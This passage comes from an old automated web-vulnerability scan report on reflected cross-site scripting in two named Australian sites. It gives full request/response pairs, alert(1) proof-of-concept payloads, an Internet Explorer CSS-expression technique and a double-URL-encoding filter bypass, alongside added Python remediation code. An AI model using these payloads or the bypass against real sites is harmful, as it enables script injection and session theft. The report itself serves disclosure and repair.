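The two defence layers from the remediation background, applied to the two sink types this report keeps finding: a double-quoted JavaScript string such as s.prop7="..." (this finding) and a double-quoted HTML attribute such as the parentUrl hidden field (2.4). This is an added example in Python, not code from either site; render_vulnerable and render_safe are stand-ins for whatever server-side templating the sites actually use, ID_RE is an assumed validation rule based on the integer ids seen in the requests, and the two sample payloads are copied from findings 2.1 and 2.4.

```python
import html
import json
import re

# Constructed samples: the echoed payloads from findings 2.1 and 2.4.
JS_PAYLOAD = '1000ff716";alert(1)//ce6330e97f5'
ATTR_PAYLOAD = 'bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078'

# Layer 1: strict validation on arrival. The legitimate cid/aid/pid values in
# this report (55653, 1000) are plain integers, so accept nothing else.
ID_RE = re.compile(r"\A[0-9]{1,12}\Z")


def validate_id(value: str) -> int:
    """Return the id as an int, or raise. Reject bad input; never 'clean' it."""
    if not ID_RE.match(value):
        raise ValueError("invalid id: %r" % value)
    return int(value)


def is_valid_id(value: str) -> bool:
    try:
        validate_id(value)
        return True
    except ValueError:
        return False


# Layer 2: encode for the exact context the value is written into.
def html_attr(value: str) -> str:
    """Encode for a double-quoted HTML attribute value (& < > " ')."""
    return html.escape(value, quote=True)


def js_string_literal(value: str) -> str:
    """Emit a JS string literal that is safe inside an inline <script>.
    json.dumps escapes quotes and backslashes; < > & and the JS line
    terminators U+2028/U+2029 are escaped too, so the literal can never
    contain </script> or terminate the statement."""
    s = json.dumps(value)
    for raw, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                     ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        s = s.replace(raw, esc)
    return s


def render_vulnerable(aid: str, cid: str) -> str:
    """The pattern visible in the responses: raw string interpolation."""
    return ('<input type="hidden" name="parentUrl" value="/?cid=%s" />\n'
            '<script>s.prop7="%s";</script>') % (cid, aid)


def render_safe(aid: str, cid: str) -> str:
    """Same markup, each value encoded for its own context. The encoder
    supplies the JS quotes, so the template must not add its own."""
    return ('<input type="hidden" name="parentUrl" value="%s" />\n'
            '<script>s.prop7=%s;</script>') % (html_attr("/?cid=" + cid),
                                             js_string_literal(aid))


# Crude breakout detector used by the assertions: an unescaped quote that is
# immediately followed by the attacker's syntax. Enough for these two payloads.
BREAKOUT_RE = re.compile(r'(?<!\\)"(?:;alert\(1\)|style=")')


def breaks_out(rendered: str) -> bool:
    return BREAKOUT_RE.search(rendered) is not None
```

With validation in place the payloads never reach the template at all; the encoding layer is what keeps the page safe if a value that legitimately contains punctuation (such as the ref=Dating strings) has to be echoed.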

Request

GET /?cid=55653&aid=1000ff716"%3balert(1)//ce6330e97f5&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000ff716alert1ce6330e97f5|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:27:00 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3859747244.16671.0000; path=/
Set-Cookie: lbid=dd03e1ce-c870-46bf-4f21-93453fb42045;expires=Sun, 22-May-2011 03:27:00 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
"";
                       s.prop4="";
                       s.prop5="";
                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000ff716";alert(1)//ce6330e97f5";
                       s.evar7="1000ff716";alert(1)//ce6330e97f5";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s
...[SNIP]...

2.2. http://bigpond.eharmony.com.au/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228d2"%3balert(1)//66a421fe9a4 was submitted in the cid parameter. This input was echoed as 228d2";alert(1)//66a421fe9a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653228d2"%3balert(1)//66a421fe9a4&aid=1000&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:26:59 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653228d2alert166a421fe9a4|aid=1000|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:26:59 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:41:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3893301676.16671.0000; path=/
Set-Cookie: lbid=6f56d95c-6f1b-4784-6f08-d36dfdd0c91b;expires=Sun, 22-May-2011 03:26:59 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
       s.prop1="";
                       s.prop2="";
                       s.prop3="";
                       s.prop4="";
                       s.prop5="";
                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653228d2";alert(1)//66a421fe9a4";
                       s.evar8="55653228d2";alert(1)//66a421fe9a4";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conver
...[SNIP]...

2.3. http://bigpond.eharmony.com.au/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e6"%3balert(1)//d81f9eceae8 was submitted in the pid parameter. This input was echoed as 5b6e6";alert(1)//d81f9eceae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653&aid=1000&pid=10005b6e6"%3balert(1)//d81f9eceae8&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:02 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000|pid=10005b6e6alert1d81f9eceae8|ref=Dating; expires=Thu, 23-Dec-2010 03:27:02 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:02 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3943633324.16671.0000; path=/
Set-Cookie: lbid=26761b98-9988-4033-50f8-4f5e01c879ab;expires=Sun, 22-May-2011 03:27:02 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000";
                       s.evar7="1000";

                       s.prop33="10005b6e6";alert(1)//d81f9eceae8";
                       s.evar33="10005b6e6";alert(1)//d81f9eceae8";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s.events="";
                       s.eVar1="";
                       s.eVar2=""
...[SNIP]...

2.4. http://bigpondmusic.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 was submitted in the cid parameter. This input was echoed as cc97d"style="x:expression(alert(1))"3d602eff078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers. The injection point is a hidden input, on which ordinary event-handler attributes would not fire, which is why the PoC relies on expression() rather than an event handler. The attribute-context injection itself is browser-independent; whether it can be turned into script execution in other browsers depends on which further characters (such as < and >) the application lets through, which this finding does not establish.

Request

GET /?cid=bph-music-headcc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?cid=bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078" />
...[SNIP]...

2.5. http://bigpondmusic.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c8ab"style="x:expression(alert(1))"27f2f63ab70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers. The sink is the parentUrl hidden field, which is populated with the raw request URL, so any part of the query string, not only the values of known parameters, reaches it.

Request

GET /?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1 HTTP/1.1
Host: bigpondmusic.com
Proxy-Connection: keep-alive
Referer: http://www.telstraenterprise.com/Pages/Home.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 23 Nov 2010 02:44:20 GMT
Content-Length: 155765


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?7c8ab"style="x:expression(alert(1))"27f2f63ab70=1" />
...[SNIP]...

2.6. http://bigpondmusic.com/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 was submitted in the ref parameter. This input was echoed as 704f3"style="x:expression(alert(1))"b95956680e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /?ref=Net-Head-Music704f3"style%3d"x%3aexpression(alert(1))"b95956680e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155783


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>BigPond Music - Music Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?ref=Net-Head-Music704f3"style="x:expression(alert(1))"b95956680e9" />
...[SNIP]...

2.7. http://bigpondmusic.com/100/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a30'%3bd1138b1a62b was submitted in the REST URL parameter 1. This input was echoed as f1a30';d1138b1a62b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Finding 2.8, against the same REST URL parameter, shows that the application blocks certain characters unless they are double-URL-encoded; that filter is the likely obstacle here and is the first thing to test manually.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100f1a30'%3bd1138b1a62b/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100f1a30';d1138b1a62b';
   s.prop4 = '70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.8. http://bigpondmusic.com/100/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96 was submitted in the REST URL parameter 1. This input was echoed as d2e6b"><script>alert(1)</script>32cac2f6a96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
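The order of operations that makes double URL-encoding work, and the fix described above, as an added example in Python. This is not the application's code: the blocklist and the second decode are assumptions chosen to reproduce the observed behaviour (single-encoded < is blocked, %253c gets through), and RAW_SEGMENT is the first path segment exactly as sent in this finding's request.

```python
import html
from typing import Optional
from urllib.parse import unquote

# Constructed: REST URL parameter 1 exactly as sent in the finding 2.8 request.
RAW_SEGMENT = ("100d2e6b%2522%253e%253cscript%253ealert%25281%2529"
               "%253c%252fscript%253e32cac2f6a96")

# Assumed filter: the characters the application refuses when it sees them.
BLOCKED = frozenset('<>"\'')


def passes_blocklist(value: str) -> bool:
    return not any(c in BLOCKED for c in value)


def vulnerable_pipeline(raw_segment: str) -> Optional[str]:
    """Assumed order of operations that reproduces the bypass.
    Returns the rendered field, or None if the filter rejected the input."""
    once = unquote(raw_segment)          # web server decodes once: %2522 -> %22
    if not passes_blocklist(once):       # filter sees only %22, %3c ... and passes it
        return None
    twice = unquote(once)                # application decodes again: %22 -> "
    return ('<input type="hidden" name="parentUrl" '
            'value="http://bigpondmusic.com/%s/70" />' % twice)


def fixed_pipeline(raw_segment: str) -> Optional[str]:
    """Decode exactly once (the server's decode, simulated here), validate the
    canonical value, and encode for the attribute context on output."""
    canonical = unquote(raw_segment)
    if not passes_blocklist(canonical):  # validation after canonicalisation
        return None
    return ('<input type="hidden" name="parentUrl" '
            'value="http://bigpondmusic.com/%s/70" />'
            % html.escape(canonical, quote=True))
```

In the fixed version the double-encoded input is no longer interesting: it survives as the literal text %22%3e%3cscript%3e... inside the attribute, and output encoding would neutralise it even if the blocklist were removed entirely.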

Request

GET /100d2e6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32cac2f6a96/70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100d2e6b"><script>alert(1)</script>32cac2f6a96/70" />
...[SNIP]...

2.9. http://bigpondmusic.com/100/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 was submitted in the REST URL parameter 2. This input was echoed as 65295"><script>alert(1)</script>803665935d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /100/7065295%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e803665935d5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/7065295"><script>alert(1)</script>803665935d5" />
...[SNIP]...

2.10. http://bigpondmusic.com/100/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccad'%3b8b45135ef4a was submitted in the REST URL parameter 2. This input was echoed as 4ccad';8b45135ef4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/704ccad'%3b8b45135ef4a HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88005


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '704ccad';8b45135ef4a';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.11. http://bigpondmusic.com/100/70 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/70

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b21f"style="x:expression(alert(1))"d5b1a6bf075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /100/70?2b21f"style%3d"x%3aexpression(alert(1))"d5b1a6bf075=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
